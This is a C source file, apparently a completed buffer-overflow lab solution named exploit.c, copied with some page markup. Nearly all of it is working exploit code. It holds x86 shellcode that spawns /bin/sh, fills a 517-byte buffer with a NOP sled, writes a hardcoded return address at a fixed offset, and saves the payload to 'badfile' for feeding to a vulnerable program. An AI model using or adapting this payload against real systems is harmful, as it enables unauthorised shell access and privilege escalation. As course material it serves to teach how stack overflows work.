37 lines
1.0 KiB
C
37 lines
1.0 KiB
C
|
/* exploit.c */
|
||
|
|
/* A program that creates a file containing code for launching shell*/
|
||
|
|
#include <stdlib.h>
|
||
|
|
#include <stdio.h>
|
||
|
|
#include <string.h>
|
||
|
|
const char shellcode[]=
|
||
|
|
"\x31\xc0" /* xorl %eax,%eax */
|
||
|
|
"\x50" /* pushl %eax */
|
||
|
|
"\x68""//sh" /* pushl $0x68732f2f */
|
||
|
|
"\x68""/bin" /* pushl $0x6e69622f */
|
||
|
|
"\x89\xe3" /* movl %esp,%ebx */
|
||
|
|
"\x50" /* pushl %eax */
|
||
|
|
"\x53" /* pushl %ebx */
|
||
|
|
"\x89\xe1" /* movl %esp,%ecx */
|
||
|
|
"\x99" /* cdq */
|
||
|
|
"\xb0\x0b" /* movb $0x0b,%al */
|
||
|
|
"\xcd\x80" /* int $0x80 */
|
||
|
|
;
|
||
|
|
void main(int argc, char **argv)
|
||
|
|
{
|
||
|
|
char buffer[517];
|
||
|
|
FILE *badfile;
|
||
|
|
/* Initialize buffer with 0x90 (NOP instruction) */
|
||
|
|
memset(&buffer, 0x90, 517);
|
||
|
|
/* You need to fill the buffer with appropriate contents here */
|
||
|
|
strcpy(buffer + (517 - strlen(shellcode) - 1), shellcode);
|
||
|
|
int offset = 0x24;
|
||
|
|
unsigned long *tmp = (unsigned long *)(buffer + offset);
|
||
|
|
*(tmp) = (0xbffff4c8 + offset + 4 + 1);
|
||
|
|
buffer[516] = 0;
|
||
|
|
/* Save the contents to the file "badfile" */
|
||
|
|
badfile = fopen("./badfile", "w");
|
||
|
|
fwrite(buffer, 517, 1, badfile);
|
||
|
|
fclose(badfile);
|
||
|
|
}
|
||
|
|
|